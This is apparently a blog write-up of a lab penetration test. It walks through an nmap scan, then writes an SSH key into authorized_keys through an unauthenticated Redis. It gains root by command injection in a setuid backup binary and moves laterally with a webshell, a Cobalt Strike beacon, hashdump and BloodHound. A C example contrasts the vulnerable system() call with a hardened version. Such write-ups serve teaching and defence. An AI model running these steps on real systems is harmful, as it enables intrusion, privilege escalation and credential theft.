Start your Juejin growth journey! This is day 20 of my participation in the "Juejin Daily Plan · December Writing Challenge".
Target machine 0806
Redis unauthenticated access
WordPress 6.0.1 is too new: as of this writing (August 2022) no vulnerability has been published for it, so the web application itself is not the way in.
[Screenshot: the WordPress site at http://172.16.200.130 ("My Blog - Just another WordPress site", default Sample Page), flagged "Not secure" by the browser; taken 2022/8/5]
nmap scan (run from the Windows attack box; the first scan without -v only reported the summary line, the second one lists the discovered ports):

C:\悬剑武器库\tools\目录扫描\dirsearch>nmap -p 1-1000 -sS 172.16.200.130
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-04 16:45 China Standard Time
Nmap done: 1 IP address (1 host up) scanned in 2.38 seconds

C:\悬剑武器库\tools\目录扫描\dirsearch>nmap -p 1-1000 -sS -v 172.16.200.130
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-04 16:46 China Standard Time
Initiating Ping Scan at 16:46
Scanning 172.16.200.130 [4 ports]
Completed Ping Scan at 16:46, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:46
Completed Parallel DNS resolution of 1 host. at 16:46, 2.01s elapsed
Initiating SYN Stealth Scan at 16:46
Scanning 172.16.200.130 [1000 ports]
Discovered open port 80/tcp on 172.16.200.130
Discovered open port 22/tcp on 172.16.200.130
Discovered open port 6739/tcp on 172.16.200.130
Port 6739 is open. Redis normally listens on 6379, so this looks like Redis moved to a non-default port. A quick way to confirm both the service and the missing authentication is `redis-cli -h 172.16.200.130 -p 6739 ping`: a PONG reply without any AUTH means unauthenticated access.

Redis unauthenticated access: after connecting, write our SSH public key into authorized_keys by pointing the RDB dump at the user's .ssh directory. The key is padded with blank lines on both sides so that the binary RDB header and trailer Redis writes around the value end up on their own lines and sshd still parses the key line:

$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
$ cat foo.txt | redis-cli -h 172.16.200.130 -p 6739 -x set crackit
$ redis-cli -h 172.16.200.130 -p 6739
> config set dir /home/ubt/.ssh/
> config set dbfilename "authorized_keys"
> save

This only works when /home/ubt/.ssh/ exists and the Redis process runs as a user allowed to write there; `config get dir` and `config get dbfilename` before the change record the original values so they can be restored afterwards.

Output of `info server` (screenshot not reproduced here; it confirms the service is Redis and shows its version and host OS).
SSH remote connection with the private key matching the public key we wrote:

ubt@srv-web:/opt$ Connection reset by 172.16.200.130 port 22
PS C:\Users\xuanjian\Desktop\20220804 靶场\ssh> ssh -i .\id_rsa ubt@172.16.200.130
Warning: Identity file ./id_rsa not accessible: No such file or directory.
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.15.0-41-generic x86_64)
(Documentation / Management / Support links omitted)
Updates can be applied immediately.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Thu Aug 4 10:01:28 2022 from 172.16.200.128
ubt@srv-web:~$
Check .bash_history
Check system information
Check the cron jobs
One cron job runs the bk command
ubt@srv-web:~$ which bk
/usr/local/bin/bk
ubt@srv-web:~$ /usr/local/bin/bk
This is website backup program
Usage:
/usr/local/bin/bk WEBSITE_PATH BACKUPFILE
bk turns out to be a website backup program, and it is a setuid binary: if it has a command injection vulnerability, the injected command will run with root privileges.
ubt@srv-web:~$ ls -al /usr/local/bin/bk
-rwsr-sr-x 1 root root 14472 Jul 27 00:17 /usr/local/bin/bk
Note the `s` in the owner's execute position (rws): that is the setuid bit. It does not mean every user may modify the file; it means that whoever executes the file runs it with the file owner's effective UID, here root (the group position is `s` as well, so the setgid bit is set too). The classic example is /usr/bin/passwd, which is setuid root so that every user can change their own password even though only root can write /etc/shadow.
strings bk
`strings bk` reveals the format string `tar zcvf %s.tar.gz %s`: the program formats the two arguments into that tar command line and runs it through a shell, so the input can be crafted.
ubt@srv-web:/usr/local/bin$ tar zcvf s.tar.gz website_path | id
tar: website_path: Cannot stat: No such file or directory
tar (child): s.tar.gz: Cannot open: Permission denied
tar (child): Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error is not recoverable: exiting now
ubt@srv-web:/usr/local/bin$ bk "1|id"
This is website backup program
Usage:
bk WEBSITE_PATH BACKUPFILE
ubt@srv-web:/usr/local/bin$ bk "1|id" 1
[*] web path:1|id
[*] backup file:1.tar.gz
tar: 1: Cannot stat: No such file or directory
tar: Exiting with failure status due to previous errors
With `bk "1|id" 1` the command line bk builds becomes `tar zcvf 1.tar.gz 1|id`: tar fails on the nonexistent path, but the shell still runs `id` after the pipe, and because bk is setuid root the injected command runs with root's effective UID. Check the `id` output for `euid=0(root)`: on Ubuntu /bin/sh is dash, which keeps the inherited effective UID, whereas bash would drop it back to the real user unless started with `-p`.

`bk "1|cat /var/www/html/wp-config.php" 1` reads the MySQL account and password from the site's configuration file.
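As an added example (this is not the bk binary from the target, whose source is not shown on the page), here is the bug class reconstructed in C: a setuid-root backup tool that formats user input into `tar zcvf %s.tar.gz %s` and hands it to system(), next to a hardened version that validates both arguments and execs tar directly with an argument vector. The function names (build_tar_command, backup_unsafe, is_safe_path, is_safe_name, backup_safe) and the hardcoded /usr/bin/tar path are this example's own assumptions.

```c
/* Added example reconstructing the bk bug class; not the target's code.
 * Assumes tar lives at /usr/bin/tar (deliberately hardcoded: a setuid
 * program must not let PATH pick the binary). */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable pattern: the command line that `strings bk` suggests bk builds.
 * Returns the length written, or -1 if it does not fit. */
int build_tar_command(char *out, size_t cap, const char *web_path, const char *backup)
{
    int n = snprintf(out, cap, "tar zcvf %s.tar.gz %s", backup, web_path);
    return (n < 0 || (size_t)n >= cap) ? -1 : n;
}

/* system() runs "/bin/sh -c <cmd>", so '|', ';' or '$(...)' inside
 * web_path are interpreted by the shell with the binary's effective UID. */
int backup_unsafe(const char *web_path, const char *backup)
{
    char cmd[512];
    if (build_tar_command(cmd, sizeof cmd, web_path, backup) < 0)
        return -1;
    return system(cmd);
}

/* Hardened: absolute path only, no "..", and a character whitelist that
 * excludes every shell metacharacter. */
int is_safe_path(const char *p)
{
    if (p == NULL || *p != '/' || strstr(p, "..") != NULL)
        return 0;
    for (const unsigned char *c = (const unsigned char *)p; *c; c++)
        if (!isalnum(*c) && !strchr("/._-", *c))
            return 0;
    return 1;
}

/* A backup name must not start with '-' or tar would parse it as an option
 * (e.g. --checkpoint-action=exec=..., another road to root). */
int is_safe_name(const char *n)
{
    if (n == NULL || *n == '\0' || *n == '-')
        return 0;
    for (const unsigned char *c = (const unsigned char *)n; *c; c++)
        if (!isalnum(*c) && !strchr("._-", *c))
            return 0;
    return 1;
}

/* Execs tar with a fixed argv: no shell, so no metacharacter
 * interpretation, and "--" ends option parsing before the operands.
 * Returns tar's exit status, or -1 when the input is rejected. */
int backup_safe(const char *web_path, const char *backup)
{
    char archive[256];
    if (!is_safe_path(web_path) || !is_safe_name(backup))
        return -1;
    if (snprintf(archive, sizeof archive, "%s.tar.gz", backup) >= (int)sizeof archive)
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = {"tar", "zcf", "--", archive, (char *)web_path, NULL};
        execv("/usr/bin/tar", argv);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv)
{
    char cmd[512];
    if (argc != 3) {
        fprintf(stderr, "usage: %s WEBSITE_PATH BACKUPFILE\n", argv[0]);
        return 2;
    }
    if (build_tar_command(cmd, sizeof cmd, argv[1], argv[2]) >= 0)
        printf("[*] unsafe version would run via /bin/sh -c: %s\n", cmd);
    printf("[*] safe version: %s\n",
           backup_safe(argv[1], argv[2]) == 0 ? "archive written" : "rejected or tar failed");
    return 0;
}
```

Run it as `./example '1|id' 1` to see the exact shell command the unsafe path would execute and the safe path refusing the same input. The whitelist is stricter than the shell alone would require because tar has its own option parsing; the leading-dash check together with `--` closes that second route.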
The site and its database are separated: the database runs on 172.16.10.210. Connecting to MySQL through a proxy shows it is a recent MySQL version. However, the database server also exposes a web application: the page itself returns 404, but the favicon shows it was set up with XAMPP, so a shell is written into XAMPP's default web root.
After connecting with AntSword (蚁剑), upload a Cobalt Strike beacon; hashdump recovers the password hashes.
Then use BloodHound inside the network to collect domain information.